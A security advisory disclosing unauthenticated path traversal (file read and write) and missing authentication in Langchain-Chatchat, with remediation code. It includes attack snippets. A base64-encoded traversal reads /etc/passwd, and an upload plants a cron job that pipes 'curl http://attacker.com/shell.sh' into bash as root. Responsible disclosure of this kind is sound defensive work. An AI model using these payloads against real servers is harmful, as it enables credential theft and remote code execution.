[SECURITY] Multiple Critical Vulnerabilities: Unauthenticated Path Traversal (Arbitrary File Read/Write) + Missing Authentication on All API Endpoints
Summary
Three critical security vulnerabilities have been identified in Langchain-Chatchat that allow unauthenticated remote attackers to read/write arbitrary files on the server and fully control the application. A combined attack chain can achieve remote code execution (RCE) without any authentication.
| # | Vulnerability | Severity | CWE | CVSS |
|---|---|---|---|---|
| 1 | Unauthenticated Path Traversal - Arbitrary File Read | HIGH | CWE-22 | 7.5 |
| 2 | Missing Authentication on All API Endpoints | CRITICAL | CWE-306 | 9.8 |
| 3 | Unauthenticated Path Traversal - Arbitrary File Write | HIGH | CWE-22 + CWE-78 | 7.5 |
Discoverer: IcySun (icysun@qq.com)
Advisory 1: Unauthenticated Arbitrary File Read
Endpoint: GET /v1/files/{file_id}/content
The _get_file_path() helper in libs/chatchat-server/chatchat/server/api_server/openai_routes.py decodes a base64url-encoded file_id and uses it directly in os.path.join() without sanitization:
```python
import base64
import os

# Vulnerable helper as found in openai_routes.py: the decoded file_id is joined
# onto the sandbox directory with no traversal check.
def _get_file_path(file_id: str) -> str:
    file_id = base64.urlsafe_b64decode(file_id).decode()
    return os.path.join(Settings.basic_settings.BASE_TEMP_DIR, "openai_files", file_id)
```
No check for ../ sequences, no os.path.realpath() validation, no filename format restriction.
Attack:
```python
import base64

target = "assistants/2024-01-01/../../../../../../../../etc/passwd"
file_id = base64.urlsafe_b64encode(target.encode()).decode()
# GET /v1/files/{file_id}/content -> returns /etc/passwd
```
Impact: Read any file accessible to the server process — config files, API keys, SSH keys, database credentials, etc.
Advisory 2: Missing Authentication on All API Endpoints
The FastAPI application in libs/chatchat-server/chatchat/server/api_server/server_app.py registers no authentication middleware. All endpoints are accessible without credentials:
- File management (/v1/files/*, /chat/file/upload)
- Knowledge base operations (/kb/*)
- Chat and AI interactions (/v1/chat/completions, /chat/*)
- Tool execution and MCP connections
Impact: Any network-reachable attacker can manipulate knowledge bases, execute tools, consume LLM API quotas, and exfiltrate all data.
Advisory 3: Unauthenticated Arbitrary File Write
Endpoint: File upload via parse_file() in libs/chatchat-server/chatchat/server/chat/file_chat.py
```python
import os

# Vulnerable upload handler as found in file_chat.py; `dir` is the upload
# directory chosen by the server (its definition is not shown in this advisory).
def parse_file(file: UploadFile) -> dict:
    filename = file.filename  # user-controlled, from Content-Disposition header
    file_path = os.path.join(dir, filename)
    with open(file_path, "wb") as f:
        f.write(file.file.read())
```
The filename from the multipart upload is used directly with no sanitization, no os.path.basename(), no path containment check.
Attack:
```python
import requests

requests.post("http://target:7861/chat/file/upload", files={
    "file": ("../../../../../etc/cron.d/backdoor", "* * * * * root curl http://attacker.com/shell.sh | bash\n", "text/plain")
})
```
Impact: Arbitrary file write — can overwrite application configs, write to cron/systemd directories, or inject into shell profiles for RCE.
Combined Attack Chain
```text
No Auth (Advisory 2)
 +-> Arbitrary File Read (Advisory 1)  -> Steal secrets, SSH keys, credentials
 +-> Arbitrary File Write (Advisory 3) -> Write cron/systemd units -> RCE
 +-> Direct API Abuse                  -> Knowledge base poisoning, quota exhaustion
```
An anonymous attacker can read secrets, then write malicious files for RCE — all without authentication.
Remediation
- Add authentication middleware — API key or JWT-based auth for all endpoints (highest priority).
- Validate file paths — use os.path.realpath() + prefix check for all file operations.
- Sanitize filenames — use os.path.basename() for uploads, validate format for downloads.
- Restrict process privileges — do not run as root; use minimal permissions.
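The two path fixes above (realpath + prefix check for Advisory 1, basename + format validation for Advisory 3) are shown together below as an added example. This is editor-written code, not Langchain-Chatchat's own patch: it assumes a temporary directory standing in for Settings.basic_settings.BASE_TEMP_DIR, the hypothetical names safe_get_file_path() and safe_upload_path() as hardened counterparts of _get_file_path() and parse_file(), and an allow-list regex for file_id segments that is the author's own choice. The containment check uses os.path.commonpath rather than a bare startswith, so a sandbox named /tmp/x does not accept /tmp/xyz.

```python
import base64
import os
import re
import tempfile

# Constructed sandbox root standing in for Settings.basic_settings.BASE_TEMP_DIR (assumption).
BASE_TEMP_DIR = tempfile.mkdtemp(prefix="chatchat-demo-")
OPENAI_FILES_DIR = os.path.join(BASE_TEMP_DIR, "openai_files")
UPLOAD_DIR = os.path.join(BASE_TEMP_DIR, "uploads")
os.makedirs(OPENAI_FILES_DIR, exist_ok=True)
os.makedirs(UPLOAD_DIR, exist_ok=True)

# Allowed shape of a decoded file_id or upload name: relative segments of safe characters only
# (hypothetical allow-list; tighten to the project's real id format when applying this).
_SAFE_PATH_RE = re.compile(r"^[A-Za-z0-9._-]+(?:/[A-Za-z0-9._-]+)*$")


class PathTraversalError(ValueError):
    """Raised when a caller-supplied name resolves outside its sandbox."""


def _contain(base_dir: str, candidate: str) -> str:
    """realpath + prefix check: resolve candidate and require it to stay inside base_dir."""
    base = os.path.realpath(base_dir)
    resolved = os.path.realpath(candidate)
    # commonpath avoids the classic startswith bug ('/tmp/x' accepting '/tmp/xyz').
    if os.path.commonpath([base, resolved]) != base:
        raise PathTraversalError(f"{candidate!r} escapes {base_dir!r}")
    return resolved


def safe_get_file_path(file_id: str) -> str:
    """Hardened counterpart of _get_file_path(): format check, then containment check."""
    try:
        decoded = base64.urlsafe_b64decode(file_id).decode()
    except ValueError as exc:  # covers binascii.Error and UnicodeDecodeError
        raise ValueError("malformed file_id") from exc
    if not _SAFE_PATH_RE.fullmatch(decoded) or ".." in decoded.split("/"):
        raise PathTraversalError(f"rejected file_id {decoded!r}")
    return _contain(OPENAI_FILES_DIR, os.path.join(OPENAI_FILES_DIR, decoded))


def safe_upload_path(client_filename: str) -> str:
    """Hardened counterpart of parse_file()'s path construction: keep only the basename."""
    # basename() drops every directory component the client put in Content-Disposition;
    # backslashes are normalised first so Windows-style traversal cannot slip through.
    name = os.path.basename(client_filename.replace("\\", "/"))
    if name in ("", ".", "..") or not _SAFE_PATH_RE.fullmatch(name):
        raise ValueError(f"rejected upload filename {client_filename!r}")
    return _contain(UPLOAD_DIR, os.path.join(UPLOAD_DIR, name))


def demo() -> dict:
    """Exercise both helpers with a benign id and the traversal shapes from this advisory."""
    results = {}
    good_id = base64.urlsafe_b64encode(b"assistants/2024-01-01/notes.txt").decode()
    results["good_inside_sandbox"] = safe_get_file_path(good_id).startswith(
        os.path.realpath(OPENAI_FILES_DIR) + os.sep
    )
    bad_id = base64.urlsafe_b64encode(b"assistants/2024-01-01/../../../../etc/passwd").decode()
    try:
        safe_get_file_path(bad_id)
        results["traversal_read_blocked"] = False
    except PathTraversalError:
        results["traversal_read_blocked"] = True
    # The upload name from Advisory 3 collapses to its basename inside UPLOAD_DIR.
    results["upload_name"] = os.path.basename(safe_upload_path("../../../../../etc/cron.d/backdoor"))
    try:
        safe_upload_path("..")
        results["dotdot_name_rejected"] = False
    except ValueError:
        results["dotdot_name_rejected"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

Both checks are layered on purpose: the format check rejects obviously bad input early with a clear error, while the realpath containment check is the backstop that also catches symlinks and encodings the regex did not anticipate.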
Proof of Concept
A unified PoC script demonstrating all three vulnerabilities is available. Please contact icysun@qq.com for the full PoC, detailed report, and reproduction steps.
Disclaimer: This report is submitted for responsible disclosure. The PoC is intended solely for authorized security testing and vulnerability validation by the Langchain-Chatchat maintainers.